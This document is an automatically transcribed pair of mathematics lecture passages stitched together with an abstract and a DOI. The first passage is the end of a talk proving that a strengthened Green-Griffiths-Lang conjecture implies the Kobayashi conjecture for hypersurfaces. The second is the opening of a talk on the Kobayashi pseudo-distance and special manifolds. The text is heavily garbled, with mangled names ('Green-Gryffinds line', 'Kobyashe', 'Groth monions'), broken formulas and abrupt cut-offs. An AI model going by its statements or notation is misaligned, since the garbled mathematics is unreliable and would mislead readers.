I should mention Shoes name in here too, he did, he proved that Quintic NP3 which isn't quite covered by this, he proved that they contain no rational or elliptic curves which is not quite algebraically hyperbolic but getting like very close. And so this was in the 80s and 90s and then it was, there was that one last case, right, the Quintic surfaces and Azet and I recently polished off that last case. So if D is at least 2N minus 1 then we know that X is algebraically hyperbolic. You might say well, can this be improved and the answer is not for all N. So if N is 3 then suppose we wanted to state the same result for 2N minus 2, well that's equal to 4 and so this is the K3 surface and it's well known that these are not algebraically hyperbolic, they have rational curves in fact and lots of elliptic curves. So that's what we expect, we expect X to be hyperbolic of D is at least 2N minus 1. Let's talk about what we know. So I'm going to, this is of January of, there's been some very fast new results on this and so I'm going to separate things that happened January of 2018 and earlier from things within the last year. And so there's been so much great work on the Griegengrafis line conjecture even for hyper surfaces that I'm going to write a bunch of names down and I'm sorry if I missed you but there are probably more names that I forgot. So Derrondoll and these aren't in chronological order either, unfortunately. I should, well too late. And then McQuillan and Pound have worked for P3 and the like a particularly important result was by De Verriero, Merker and Russo. And then Demae has some improvements on their bounds and there are more people. But the best bound I know of is N log N log N to the N. Oh, what, oh yes, sorry, I will, so this is conjecture, Green-Gryffis Lang is known for this three, for this range of degrees. Is there anything I need to erase and rewrite anything else? Or is this okay? And then I'll write bigger going forward. How do I, and then the Kobyashe conjecture also, so some of the names to mention here are Su and Broodbeck and Deng and Demae and I think that's actually most of them. And I think the results on the Kobyashe conjecture are more recent. And they prove conjecture K for, I wrote down D at least one fifth, EN to the 2N. So then in, okay, in, well it wants to be here. So in June of 2018, David Yang and I prove that a, so I'll talk more about the technicalities here but it's a slightly stronger form of the Green-Gryffis Lang conjecture for D at least D sub 2N, whoops, D sub N implies the Green-Gryffis Lang, the Kobyashe conjecture for D at least D 2N minus 3. So basically if you roughly half the dimension or half the dimension or double your bound on, no, half the dimension, then if you knew the Green-Gryffis Lang conjecture then you can get the Kobyashe conjecture. And so then, so that was in June and then Merkur in July of 2018 and then later in, so he had an immediately improved bound and then in January 2019, just last month. So I won't write all the bounds because we otherwise would be here all day but I'll write the current best one that I know, Merkur and Ta. They prove conjecture, the Green-Gryffis Lang conjecture for D at least square root N log N to the N and then use our results to prove the Kobyashe conjecture for D at least N log N. Yeah, yeah, yeah, sorry. Yeah, I should say the Green-Gryffis Lang conjecture for a general hyper surface. Yeah, sorry, everything I say from now on is about hyper surfaces. Yes. Are there any questions at this point? Well, let's talk a little bit about some of the proofs. So first I have to just introduce a lot of this, Jean-Pierre did probably better than I'm about to, but I'm going to say it again anyway. So a Kjet of X is a map from spec C adjoining epsilon mod epsilon to the K plus 1 to X. And so let's let JKX be the space of Kjets of X. And so how do I think of these Kjets? So I have my entire curve C mapping to X. And so the image is going to be some entire curve here. And I have the origin here. And so I take this, it's given by a power series, and I can truncate the power series to order K. And that gives me a Kjet here. And even though I started with something analytic because I truncated my power series, then there are only finitely many terms and I end up with something algebraic. And so the idea of the subject is, or the idea of the techniques on the subject are that to study the analytic thing, you study the algebraic space of jets. And you want to study conditions on the space of jets that come from an entire curve. And so how do we get conditions on the space of jets? Well, Jean-Pierre gave a lot of detail on this. And I'm mostly just going to quote the result that he said. So it was by a lot of people, again, probably like Bloch and then Green and Griffiths and Demayy and more. Here's a vector bundle, E, K, M, Tx dual, twisted by minus 1, whose sections act on the space of Kjets of x. And this vector bundle has lots of properties, but I want to focus on two particularly nice properties of these vector bundles. The first one is that they have nice functorial properties. And so what do I mean by this? I mean that if you have a family of varieties, then you get a family of these vector bundles. And I mean if you have an inclusion of varieties, these are the jet differential operators. And so if you have a jet differential operator on a bigger variety, you can restrict that operator to a sub-variety. And it still gives you an operator. And then the second property is the vanishing theorem that Jean-Pierre was saying is that H0 of E, K, M, Tx star minus 1 vanishes on jets coming from entire curves. And so if you're trying to prove the Green-Griffith line conjecture or the Kobayashi conjecture, which many of us in this room are, then what you do is you study these equations that your entire curves have to satisfy and then hope that you can show that there are none. So I want to give a rough outline of the steps to prove the Kobayashi conjecture, which unfortunately won't match very well with what Jean-Pierre said, but it's sort of more of a historical overview of some of the major steps towards proving the Kobayashi conjecture. Because I want to point out where our work falls and does it fall. So to prove the Kobayashi conjecture, the work is sort of one way to do it, that many people have taken is you first show that you have these sections, that E, K, M, Tx star, negative 1 is non-zero. It does you no good to have these equations if they all vanish. So that's step one. And step two is that you analyze the sections in various ways to show the Gringer-Fist-Lang conjecture, which is so to show that through a general point of X, there are no entire curves, which is a lot weaker than the Kobayashi conjecture. And it's much harder to control the bad locus for the Kobayashi conjecture. And then the third step is, so step one is difficult, step two is even more difficult. And then step three, at least it was the last of the steps to happen historically. So you have to do more work to show that this bad set is empty. And so what I'm going to talk, this technique I'm talking about does nothing for step one and nothing for step two currently. You would need some very clever idea to be able to make progress on step one and step two with this technique. But we completely solve step three. And in a way so that as people make improvements on steps one and two, our result will immediately solve step three for them. So again, these are the two steps left. And we solve step three. Let me put that up there. So now I want to talk about the general setting. So what we actually prove is a slightly more technical result. And I want to talk about why this more technical looking result is actually basically the same as or does what we claim it does. And so we're trying to prove something for our general hyper surface. So here we have our family of hyper surfaces. So this is the set of x. And so for each point here, we have a hyper surface. So we have a hyper surface here and we have a hyper surface here and a hyper surface here. We construct the universal hyper surface. And for these, as we vary in this family, for this hyper surface, we have a bad locus. And for this hyper surface, we have a bad locus. And for this hyper surface, we have a bad locus. And these functoriality properties of EKM show that the bad loci sort of move together nicely in a family. They'll be a locally closed sub variety of the universal hyper surface. And so let me just give some notation. So this is the bad locus. And I'm going to start giving names for these things in a second. But before I do that, I want to just talk about our goal here. Oh, no, I need to give them names first. And so definition. Let's let use of ND be the universal hyper surface. So it's just the set of P comma x such that P is an x and Pn is a degree D hyper surface. Hyper surface. Sorry, x is a degree D hyper surface and P is a point of x. And this maps naturally to Pn just by remembering the point. And it also maps naturally to the space of hyper surfaces here. And then I want a sub variety of this universal. So the universal hyper surfaces, this picture I drew with the hyper surfaces. And then the sub variety B is just the bad locus. So it's the set of P and x such that P is bad for x. What does it mean for P to be bad for x? It means that our differential equations don't fully restrict all the entire curves through that point. And the technical thing is that there exists a non singular k jet, a k jet, J in x through P such that all sections of H0, E k m, T x star minus 1 vanish on J. So we have this bad locus here, which is all the points where there's a bad k jet that could come from an entire curve, but we don't know by our differential equations. It can't come from an entire curve. And so what do we want to do? If we can show that this bad locus is very small, it has high co-dimension in UND, then there's no way it could possibly dominate the moduli space of all x. It would be too small, and so the image here can't possibly be dominant. And so that would mean a general x would have no bad locus, and so would have to be hyperbolic. And so that's what we want to do. Yeah, so let me write that remark down. I'm breaking chalk everywhere. If B in U has high co-dimension, then this means that B does not dominate. So now let me tell you the theorem that David and I actually prove, and I'm going to call this theorem star so that I can refer back to it. And the theorem is not about jet differentials. It's just about universal hypersurfaces with picked out families. So let's let M be a natural number. And let's let, so for every N and D, we need this locally closed subrider or countable union of locally closed subrides, S and D. So we have an integer and a bad locus, and we want them to satisfy that the co-dimension of S, M, D in U, M, D is at least one. So this is saying that at some point the bad locus can't be everything. That's exactly the Green-Gryffinds line conjecture. And then the second condition is like a naturalness or a functoriality. So it's if we have P in X0 is a linear section of Px. And Px is, whoops, sorry, if the smaller one is in S and D. And if it's a linear section of a bigger one, which you didn't know to start with was bad, then because the linear section was bad, you know the larger one has to be bad. So then Px is in S plus is also bad. Oh, and I have to tell you the conclusion. And the co-dimension of S, M minus C, D in U, M minus C, D is at least C plus 1. So what this is saying is if you have a family of bad subvarieties in your universal hyper surface, you know very little about this family except it's algebraic. At some point it stops being the entire universal hyper surface. And any time you have a linear section that's bad, then the original thing had to be bad. Then you know that starting at M, every time you chop by a hyperplane, the bad locus gets smaller. And so you can see how this would be really useful. We're trying to bound to bad locus. And so we just keep chopping by hyperplanes about N over 2 of them until the co-dimension gets so high that it's bigger than the dimension. And that's what gets the result. So just writing that a little bit more pedantically on the board to see that star implies the conjecture, that star implied the theorem that I stated earlier. Star shows that the Green-Gryffinds line conjecture implies the Kobayashi conjecture. So we just need to check conditions 1 and 2. And condition 1, so if we let SND be the bad locus, BND, then condition 1 here, that's exactly this corresponds to the stronger version of the Green-Gryffinds line conjecture. Right. I want to say that these jet differentials cut out a proper sub-variety in the universal hyper surface. And so currently, when people prove the Green-Gryffinds line conjecture for hyper surface, this is what they prove, the stronger version. And then to check condition 2, we just need to, so condition 1 is just a Green-Gryffinds line, and so condition 2 is exactly implied by functoriality of EKN, or E-UH. Oh no, another two M's. Maybe I'll call this one N. Since, so how to, maybe I'll call it R. M's not going to nom me. So this is implied by functoriality, right? So let's think this through slowly. So if we have a jet in some hyper surface X0, that's a linear section, and J is not, so it is a non-vertical Kjet with H0 X0 EKR TX, this vector bundle. So as I said, our space of sections vanishes on J. Right, so if we have a Kjet that, if we have a J that is not restricted by these, by our differential equations, then we have, we have, oh no. So then, I'm going to go over here, then we have these restriction maps. So we have, well, so J was, it was a, it was a jet on X0, but X0 is included into XK, and so that, just in a very natural way, gives a jet of, of our bigger X. And we have these maps, whoops, on sections going the other way. This is an R. Right, so if we had, if all of our sections here vanish on, on J, then certainly all of the sections here had to vanish, because if we had a section here that did not vanish on J, we would just map it back, like we would just restrict it to our X0, and then it would not vanish on the restriction. So this, this, that slightly awkwardly stated condition two is actually very natural in our circumstances, saying, do you have a bad Kjet? And if, if your smaller hyper surface has a bad Kjet, then your larger surface will still have that same, that exact same bad Kjet. And so, so yeah, so this, this shows that H0 XEKR TX star minus one, vanishes on J. And so this means that the pair of PX has to be bad. And so that, that's the, that theorem, nope, that's someone else's very famous theorem. Maybe it's way up there. I can't tell where it went. So theorem that Green Griffith's line implies Kobayashi, it's way up there. Excellent, yeah, that, that theorem is just a formal consequence of theorem star. And you can see that theorem star is stated very, like in, in very general terms. And so if you're working, trying to work with some other property, like some other bad property and you want to show that a very general hyper surface doesn't have it, then, and you can try and use it. So I want to spend the rest of the time talking about the proof of the theorem because even though it looks, it, almost because it's so general, it's, the proof is short and, and fairly easy because, like I have, I don't have any, like complicated machinery we're flat, flat loading around to use. So it has to be simple because there's, there's nothing to complicate it. So, so let's, let's do it. I first need, oh, oh, let's go here. I first need a proposition about, uh, Grassmanians. So proposition. Let's let A be a sub variety of, uh, a Grassmanian of K minus one planes and let's let it have co-dimension, uh, let's, let's let it be non-empty and have co-dimension at least one. And then let's let C be the set of, uh, K planes containing some element of A. Right, so again the words are a little complicated but you just take some family of K minus one planes and then you take all of the K planes that contain them. And the, the result is that there have to be more, uh, K planes. So the co-dimension has to go down and, uh, the, the proof is not difficult. I'm gonna, I'll, I'll write down the incidence correspondence and then the, the, the, the like very technically correct way to prove it would be to, uh, do a dimension count. I'll sort of wave my hands at the dimension count to try and argue why, uh, why, why it gives the thing you want. So proof. We have the natural incidence correspondence I, which is the set of lambda phi such that, so K, K minus one plane, K plane such that your K minus one plane is contained in your K plane. And this maps to, uh, the space of K minus one planes and it maps the space of K planes. And so here if we take some A of co-dimension epsilon, oh, so then we can, we can take, um, the sub variety here, uh, which is just, it's just the set of A comma C such that A is in A and C is in, or, uh, A is contained in C. Right. And so we have, we have our sub variety here and we, uh, we look this maps naturally here. Uh, the fiber, if we compare the dimensions of the fibers, they're the same, right? Here any time, any, for any point A here, you have all the C's that contain it. So fibers are co-dimension zero. And so that means that this has to be co-dimension epsilon. And now we need to look at this map down. So the map down, we have pairs A, C and we want to, so we map down to C. We have these pairs and we want to know, uh, given a pair, like for our given C here, what's the fiber, it's just all the A contained in it. I claim that that can't possibly be all the K minus one planes in C. It has to be at least one dimension fewer. So I, I'll draw a picture to try and argue that, but so here the co-dimension has to be at least one. And that implies that the co-dimension here isn't most epsilon minus one. And, uh, let me, uh, let me just draw a picture to try and argue why that, why that last fiber dimension had to be at least one. So if, if this were also co-dimension zero, then you would have that, what we would say is that you have A's and C's and every A is contained in some C and every C is, like every time you have an A, like a C containing an A, then C is in C. And every time you have an A contained in a C, then A is an A. And so what you do is you just, you start with two elements of your C and, uh, and then you, you connect them by a, by a chain of sub varieties, a chain of planes where each, each one is a K minus one plane in the other. And then if this started out in C, then this was an A. So this was in C. So this was an A. So this was in C. So this was an A. So this is in C. And that's, uh, and so that's why the fibers have to be at least co-dimension one. It's a little hard to do on the board, uh, but it's, it's not a hard statement and it's not a technical proof. And so now I want to, I want to explain how given this proposition I can, I can prove our main theorem. And so I'm gonna do, oh, let's see. Now I have to figure out how to use these boards again. No, wrong one. So I'm gonna, what I'm going to do is I'm going to tell you the proof modulo two lies and then I'm going to, I'm going to tell you what the two lies were. Uh, they don't, they don't seriously add to the difficulty, but they again add to just the amount of notation and like symbols on the board. I think I would, it's better to like be able, this, this is about like looking at it right. And once you look at it right, then it's clear and then it's not so hard to fill in the details. So let's do the idea of the proof. So the idea is you take some enormous hyper surface Y in some gigantic, uh, PN. And you can tell it's big because it's a capital letter. And we're gonna, let, um, it's gonna have a degree D and capital N is gonna be much bigger than zero. And it's, and what, let's, let's suppose for a second, this is, this is one of the lies, but it's not so hard to fix. So, so this is, I've got a bigger Y here. Here's Y and we have a point here. And suppose that Y is so big that for some N, um, ah, I need one more piece of notation which I have over here. Let's let G sub N N sub P be the set of N planes through P. And so we, we picked our Y that's so big so that we, so given we have a natural map for any Y, we have a natural map from the space, I guess, from the space of hyper N planes through P. So we can take an N plane through P and we can intersect it with Y and then we get a map to, um, U and D. And so what we're gonna assume is that, so you, you get this map, we're gonna assume that this map is surjective. Which isn't, you can't quite do that. There needs to be a fix. But that's roughly the idea. And the map is just you take an N plane and you send it to the pair P, Y intersect this N plane. And so, uh, suppose to get a contradiction that, uh, SM minus C in UM minus C, um, has co-dimension at most C, smaller than what we want. So suppose that this bad locus was, uh, too big. Then, oh, I need a name for this map. This is gonna be alpha N. And I need to rescue the board from the top. And so, so we have this map from, uh, the Groth monions of, of planes through P to, uh, the space of points, point comma hyper surface. Uh, so, and we've assumed that this SMC, N minus C is too big. So what we should do, we, our, our proposition is about, uh, Groth monions, right? So we should try and get Groth monions in the, in somehow. So let's pull back SM minus C by our alpha N, or alpha M minus C, rather. So, um, if we take the pre-image of SM minus C, I'll need some more board, then, uh, when, when you take a pre-image like that, the co-dimension, uh, can't go up, right? The, this SM minus C is, uh, um, uh, it's generically colon McCauley. So it's generically cut out by however many equations. And then when you pull it back, you have just the same equations cutting it, cutting it out. So the co-dimension could go down, but it can't go up. So, so this in, uh, um, in the Groth monion has co-dimension at most C. Let's let this be a from our proposition. It's a sub-variety of, of a Groth monion. Now, uh, so then what is, uh, C? It's just all the, um, N plus one, or the M minus C plus one planes containing one of these things. That will certainly be contained in the pre-image of the bad locus one dimension up by prop, by property two. So, so this means that if we take alpha M minus C plus one inverse of SM minus C plus one D, then in, uh, a Groth monion of M minus C plus one planes, this has co-dimension smaller. So at most C minus one. We're getting where this takes the place of our A and this, I'm, I'm claiming it takes the place of our C, it, it actually could contain C, but if, if you have it even bigger, it makes it even worse. Well, and now we run the argument again, right? We let this be our A and we look at all the, and M minus C plus two planes containing it. Uh, and so then our co-dimension has to go down yet again and we do it again and again. And so, eventually we get to alpha M inverse of SM D. And we've, we've gone, uh, enough steps so that this has to be co-dimension at most zero, uh, which contradicts one. And that's it. Uh, so I, I told, and, and that, that is, those are the essential ideas. I told you, I told a couple of lies. Uh, so let me, uh, let me give a couple, just hint at, uh, like a couple of things, like small things you would have to fix to, uh, to get the real, uh, to get, uh, a fully correct proof. And so the first one is that, um, uh, this map alpha, which was all the way up there, it, um, it's, that's technically only defined up to automorphism on our M, N plane. So you need to pick coordinates on your Grasmondian. So, uh, I mean, it's, it's no serious obstacle, but you have to work with, uh, parameterized N planes instead of, uh, instead of just the Grasmondian, but, but all the, like, you just add a parameterization and all the same ones are still true. And then the second thing you have to work around is that alpha N is not necessarily subjective. And, but, so how do you figure, how do you work on this? So all we need to do is we need to work locally, like we want to show that locally around, uh, general points of components that, um, that s has the right dimension. And so we just, uh, um, so you work locally around, uh, a, uh, p x0 in s and d. And so you pick, you pick the point you want to work locally around, and then you pick your y to be big enough so that it has that point as a section and has a, has, like, a good point as a section, which you know exists by, uh, by hypothesis. And then, and then you run the same argument. But I think, I think it's just a, it's too confusing to think about it on the board, uh, with all of the same things. Are there any questions here? That was, that was the main technique. I have a couple of last comments, but, uh, that was what I wanted to get across. Why? So, I, I, I hinted, so the, the, I think the implications about the Kobyashek conjecture are clear. If you want to prove the Kobyashek conjecture, you go after the Green-Griffin line conjecture and, and, and that's simple. I want to give some ideas of a couple other instances where this technique, uh, has been useful, uh, and, uh, to hopefully give you some ideas of other place, other places. I, I think, I think it works best for hypersurface or complete intersections. I don't know of a way to get around that, but, uh, there, there are lots of different types of properties of them. So, I want to study with, uh, with this result. And so a couple of other uses, um, you can, uh, it's a good way to restrict sub varieties of hypersurfaces. So David Yang and I proved that if you have a, uh, very general hyper, so suppose you give me a family of varieties and you give me a dimension of hypersurface and then I can pick a degree large enough so that, um, my, uh, very general hypersurface of that degree contains no varieties from your family. So large degree hypersurfaces and like avoid any, uh, any particular family of varieties that you want. Uh, another use, you can, you can use it to restrict rational curves in the space of lines of X. Uh, so this is, uh, um, probably not a variety many of you are used to thinking about if you're used to thinking about the Koba-Akshay conjecture because D is very large. But when D gets a little bit smaller, you start having these sub varieties, uh, like you start having lines on your hypersurface. And it, for your, the green griffin line conjecture, the lines certainly have to be in the bad locus, uh, because lines have lots of entire curves. Uh, but, uh, so if you look at the space of lines, the space swept out, David Yang and I proved for, um, D at least about three N over two. There are no other rational curves in that locus. So it's the lines, but nothing else. Somehow like having the lines like has soaked up all of the positivity possible, uh, and, uh, the rest of it is very positive. Uh, another application is we think about, uh, Chao Zero of hypersurfaces. Uh, so this is a group of, uh, zero cycles on the hypersurface up to rational equivalents. Uh, and it's a, uh, conjecture of either of Wazan or Chen, Luis and Cheng, depending on, uh, which paper you look at. Uh, and, uh, they, uh, that, um, you can say, say precisely how many points on your hypersurface can be equivalent to each other. Uh, and, uh, we, this technique just sort, almost immediately gives, uh, all but one cases of that conjecture. And, uh, so one, the one case was done in a difficult paper by Chen, Luis and Cheng. The, the large degree cases have been done by Wazan, and then the smaller degree cases were open. And so we, we just, uh, we completely finished off that conjecture. That was actually our original motivation for looking at this technique and this generality and the, the Kobayashi stuff was almost a bonus. Uh, and then, uh, the last application, which is, uh, more connected to what people, uh, uh, here, here think about is if you think, um, if you think about complete intersections with ample cotangent bundle. Uh, it's, it's a conjecture of Debar that, uh, if you have, um, I don't have, I will state the conjecture of Debar, but I won't, I, I'll say that there have been some results, but I won't write them down, uh, so that I can end on time. Uh, so we, we have complete intersection. So it's a conjecture of Debar that if you take a complete intersection in projective space of half the dimension, uh, where the co-dimension is equal to the dimension, then, and the degrees are large enough, then, uh, you will, uh, then your hypers, your cotangent bundle of that complete intersection will be ample. And it's, and it's, um, uh, brought back in, yeah, at about the same time it had, like, proved it just, uh, not very, not very long ago. Uh, do you remember the year? Yeah, uh, uh, just a couple of years ago. Uh, but, but the bounds they, they got were, um, were large. Like, the degree had to be at least, like, end to the end squared or something. Uh, and so if you're trying to bring the, the bound down, we, we have to sacrifice some, we don't get the full strength of the result, uh, in terms of co-dimension, but we, uh, we get a better bound on degree. We get a polynomial bound on degree. If you, if you, as long as you assume that the co-dimension has to be at least twice, no, no. Yeah, co-dimension has to be at least twice the dimension instead of at least the dimension. Uh, so let me write down the conjecture. Uh, and so if x and pn is a very general n dimensional, uh, complete intersection of type d1 up to dc with, uh, c at least n and, uh, di much greater than zero, then for all i, oh, sorry, for all i, then, uh, omega x is ample. Uh, I'm gonna stop there because I don't have time. Uh, thank you. Wow, thank you very much. So any questions or comments or remarks? Um, how specific is, uh, related to pn at this? I mean, can you use for flag varieties or something? Uh, it's, uh, for a flag right, I'm not sure. We haven't, we haven't thought about it. What you, what you need to, uh, like this Grossmanian lemma, you would need to recover for flag varieties and then the other, but like maybe you could, and then the other important property, uh, yeah, sorry, I'm trying to prove it and then, uh, talk at the same time. It's a bad idea. Yeah, so you'd need to, you'd need to, uh, recover, uh, that lemma and then you'd also need to, um, it's important to the proof that given two pointed hyper surfaces, I can find a third one, like a big dimensional one, which, um, where the two smaller ones are linear sections of it. And so you would also need to prove that for flag varieties, but I mean, it doesn't sound out of the question. Yeah, yeah, it's, yeah, yeah. Other questions? Wait, wait, please. Did you try to get some degree bounds on the, on the battle or sigh in the, in the modernized spaces? If you know degrees for, for the generic green griffin line contract, can you get a degree for, for, uh, yeah, I should have said that if you assume the, so I've erased it. If you assume the optimal green griffin is lying of D at least N plus two, then you get D at least two N minus one. No, no, I don't mean the degree of the, I mean the degree of the bad locus, the degree of the bad locus. Of course it's going to be something terrible. Oh, absolutely huge. But since you construct the bad locus for the coverage conjecture from a number of geometric constructions starting from the green griffin line conjecture, there should be some relation in terms of degrees maybe. Yeah, I haven't thought about that at all. I have no idea. Yeah. That's a good question. Other questions? Okay, so thanks again. I will try to fix that a little bit. Thank you. Alright, so finally onfer. Next one, okay...
|
An entire curve on a complex variety is a holomorphic map from the complex numbers to the variety. We discuss two well-known conjectures on entire curves on very general high-degree hypersurfaces $X$ in $\mathbb{P}^n$: the Green–Griffiths–Lang Conjecture, which says that the entire curves lie in a proper subvariety of $X$, and the Kobayashi Conjecture, which says that X contains no entire curves. We prove that (a slightly strengthened version of) the Green–Griffiths–Lang Conjecture in dimension $2n$ implies the Kobayashi Conjecture in dimension $n$. The technique has already led to improved bounds for the Kobayashi Conjecture.
|
10.5446/53786 (DOI)
|
Thank you very much to the organizers and also for the proposal to speak here. And so I will start by just some notation. So X and essentially this is a compact connected scalar. Manifold if you prefer you can just assume that this is a complex projective manifold so it will make essentially no difference here. And so N this is the dimension of X in general I will just remove the subscript here and I will call with DX this is the Kobayashi pseudo distance on X. And so this Kobayashi pseudo distance I give a short maybe not very intuitive definition. This is the largest pseudo distance on X. The pseudo distance this is a distance in which you remove just the axiom that the distance between two points is strictly positive. So this means that you have a still the triangle inequality but it may degenerate to zero. And actually it will essentially here largest pseudo distance on X distance pseudo distance delta on X such that we you have H what in which sense is it that H star of P D is less than or equal is greater than or equal to delta and this is here for any H belonging to whole from D to X. So this is the set of holomorphic maps from the unit disk D to X here and P index D this is just the Poincare metric metric on D here. So this is a short definition. It has many properties and I will not be able to to tell much on this. The only important point is that maybe D index D this is the same thing as PD and so this is a metric on the unit disk. And on the other hand this is continuous if you take any metric on X which is the deduce from the Hermitian metric on the H star of delta. Thank you. It's better like this. P index D. Thank you. It's better like this. Much better. Yeah, I agree. And so you have this is the Poincare metric so you have actually this is not complicated to show that DEC this is identically 0 here and in general if you have let me call by H yes maybe an entire curve on X I will just abbreviate it EC. This is a non-consent H belonging to all of CX. So this is just a holomorphic map from C to X which is supposed to be non-consent. And so this cobership sonometric it is continuous with respect to any standard metric on X and so you have in fact for any entire curve on X H you have the following H of C bar here has the vanishing the restriction of yeah I should write it correctly. D of X restricted to H of C and here this is the topological closure of C and this is identically 0. So you have this property which is important in particular you will have D of PN this is identically 0 and you will have also D of yes D of A this is identically 0 for any A which is a complex complex complex torus. So you have these properties for the pseudo metric and now this is a quite a transcendental object difficult to describe but nevertheless we have the following conjecture of long which is a quite famous long if we have X which is of a general type. General type which means that kappa of X is equal to N, N is the dimension so this is the top possibility for the kappa of X and then this should be equivalent to D X this is a metric generically on X and generically on X this means outside of some strict algebraic subset, sub-variate of X so essentially outside of something this should be a metric and so this implies in particular the let me call it GGL property of X and GGL this is green graphite long property which means that for any entire curve on X is as a strict Zariski closure this is Zariski closure this implies easily this property one can make other things and the aim here the aim is to describe unfortunately this is just a conjecturally conjecturally D X this is for any X which is compact compact killer and describe also this will be a qualitative description and also the say the distribution of entire curves on X and here this will be much less precise here so this is a very qualitative description and so yes so if you want this is of course the general type case this corresponds essentially to the case of curves when you have curves this corresponds to the case where G is greater than or equal to D and so it is a uniformized by the unit disk the co-beyship solometric is completely intrinsic so this means that it is invariant under the automorphism group and it descends also to a metric actually on X and so this is a generalization of curves of the general type here and so what we shall introduce this is now in order to make this description here we shall introduce many folks which are opposite to the general type case and for this reason I will call them special and so the definition is this definition is that X is special also if this is X is always assumed to be compact killer is special by definition if it has the following property for any L which is and for any P positive in omega 1 in omega P of X for any P positive I take an L which is a rank 1 locally free subchief of omega P and I will assume you can it's better to assume that it is saturated saturated but you don't need to assume this we have we have kappa of X L is strictly less than P and here I insist on the fact that the P is the same as here and here so this so V L this is rank 1 rank 1 excuse me I have to assume that this is rank 1 and so you have kappa of X L strictly less than P and here this is a very important here that you have this here in some sense there is a theorem of Bogomolov which says that actually this is always bounded by P not N here this is bounded by P which is the P here and so in some sense this means that you have not a big for this for this shift big subchiefs inside of omega P and so I will explain a little bit later what is the motivation for what I will say but here for this a class of manifolds yes they you can see this as generalized generalized rational and elliptic elliptic curves why it why is it so this is a completely obvious because you if you are on if X is a curve you have only one choice which is P is 1 and so omega P is omega 1 this is kx and so this means that what is excluded in dimension one are just the curves of a general type and so these are rational or elliptic and now the conjecture which I make I must say that this is a fairly boged okay the conjecture one is that the X is special if and only if so this is only a conjecture if the X this is identically 0 so any two points are at distance 0 for the co-beachyps sort of metric and here you can make similar statement for example a stronger condition is that for any X Y belonging to X are connected by a chain of entire curves on X of course so you can connect them if you can connect them then you have this property so this is stronger and here you can make also something which is that there exists the C on X and here by this I mean a dance entire entire curve mix here this is dance and here the dance which I mean is the metrically dance not only so this implies this implies in particular that you have ggl of X is not true in particular you should have the risky dance and our course and this is exactly the opposite of this of this situation here so this is you have dance and of course you there are many many many variants that you can give do of this for example and I don't have the time to formulate them but you have stronger the stronger thing is probably this one here this implies implies it doesn't imply actually this one but it implies at least this one and we shall see examples and motivation at least for this conjecture now the important point maybe is that now that there is a splitting theorem if you take any X you can in fact split it into two parts which are subspecial and general type and this is the important thing which makes this special important in my opinion at least and so this is here I must say I will to simplify the exposition and not go into technicalities which are related to birational maps and birational transformations and also normal crossing conditions I will forget about this to give just a simplified exposition but it's possible to take this into account and so we have a theorem for any X any X this means the X like this here for any X there exists a unique C which goes from X to C and which is called the core map core map of X which is such that first the general general fiber is special in the sense which is here so and a general here this is this means that this is outside of a countable union of strict closed subset and we have two the orbit fold base C and delta C of C is of general type and I will briefly explain I will not give exact definition here we have to take into account the orbital base not only the base C if yes I will maybe give some examples so the two extreme cases are when C is equal to X and this happens exactly when X is of general type the other extreme situation is when C is one point and this corresponds to the fact that X is special and now the general situation is a kind of splitting interpolation between these two things with parts special parts and general type part and now what is this orbital base I will not give an exact definition but this is a pair C which is the base and here we have a certain divisor delta C this is a orbital divisor of the form the form sigma of one minus over mj dj so this is a finite sum this is an effective q divisor where the mj are integer mj are greater than two integers integers and dj these are prime divisors and C and so essentially these are all the prime divisors of C the base here over which the fiber is multiple in a certain in a certain sense and the mj is the multiplicity of the generic fiber over this dj I don't give the exact definition it is I don't have the I have the time but this encodes essentially the multiple fibers of of f here and I would I would like to say that the m the mj this is the infimum inf multiplicities not not the gcd the multiplicity if you if you are in the standard case of an elliptic vibration you have the equivalent of the equality in between this and inf and gcd multiplicity so we are us just in the in the classical situation of elliptic surfaces and now yes so I have defined this and now let me try to give definition of what can once we have this theorem plus the conjecture one here we can it is let me maybe state a corollary the corollary is that there exists first delta this is a pseudo metric and see there there exists a unique such that we have dx is uh uh c c star this is the small c c um delta c here delta c so the first point is that there is in order to describe we are we want to describe the x we know that along the fibers this pseudo metric this the pseudo metric the x vanishes because the fibers are special and we use a conjecture one so this means that if you want to compute the pseudo distance between two points it depends only on the fibers I said it at least two times okay of course of course so I'm assuming okay maybe okay so then this gives you this thing and now the point is to try to describe a little bit what is dc and so I have I don't have an exact description but at least uh encadrement I don't know I don't know how to turn encadrement I don't know it lies between two things now we have dc this is greater or equal to d index c delta c and this is less than or equal to something similar c of delta c and see moreover we have this thing assuming now and here this d and c delta c these are obi-fold cobeyashi two versions of obi-fold cobeyashi pseudo metric here which are defined like this and now I give the definition um definition let me call first oh maybe yes I will take b this is a smooth connected complex curve so the interesting things for us the things which are interesting are c p1 and d these these are the interesting things uh essentially and then I will call whole of uh b and uh x no c delta c here where uh where is this obi-fold divisor is it is here so this delta c this has this form it is here uh this is the set the set of h belonging to whole of b x such that we have two conditions the first condition a is that uh um yes uh is the set h of b is not included in delta c and the second condition and the condition b is that h star of dj dj is is here oh thank you thank you thank you thank you b c thank you uh h star of dj here this is uh greater than or equal to mj times h minus one of dj I will explain what this means for nj for nj so this means the following if you want I have x c we are here inside of c and so we have our dj d1 maybe d2 and m1 m2 for example and so we have maps from b to c and so what we want is to say that the order of contact here each time you have an order of contact of um of um of h of b with one of these divisor is at least the multiplicity greater than the multiplicity you want to have large contact orders at least to the multiplicity for example is the multiplicity where infinite this you can do this for example this means that h of b should avoid b if you are on x and if this is zero no multiple fibers then you have no restrictions so this is the usual uh co-beyship solometry so you you have this uh and whole star of b and c delta c this will be the same except that we will want that uh h star that mj times h minus one of dj this is the reduced set of points here divides divides uh h star of dj so this means that here the order of contacts we don't want we don't uh um require that they are we don't only require that they they are at least the multiplicity but that they are divisible by the multiplicity which is a stronger property and in particular you always have all star this is included in all here in for this and so here we can speak of here in these games we can speak of uh divisible and orbithold entire curves or just orbithold entire curves the same for rational curves and here this is for disks and here now the definition now d of c delta c now this is the largest pseudo distance on c such that we have uh such that we have the same thing as uh here such that we have h star of delta here is less than or equal to p index d but here this is for any h belonging to all of uh d there of d and here c delta c here so we take just this uh definition here we have this thing uh and here of course for this star this will be the same but except that we shall take here all star here we have this all star now one so we have a kind of uh no it lies between and it is not uh when c is one dimensional it is possible to show our Erwin Russo did that showed that this uh that these two coincide but already in dimension two or more we there may be some differences the best thing one can expect is possibly that uh outside of some strict uh uh analytic subset here you we have a very different only by something which is positive but uh this is not quite clear what you expect for me and so this is the description I wanted to to give for the the general description the conjectural description of the x in general ah no no no no sorry I'm finished I'm 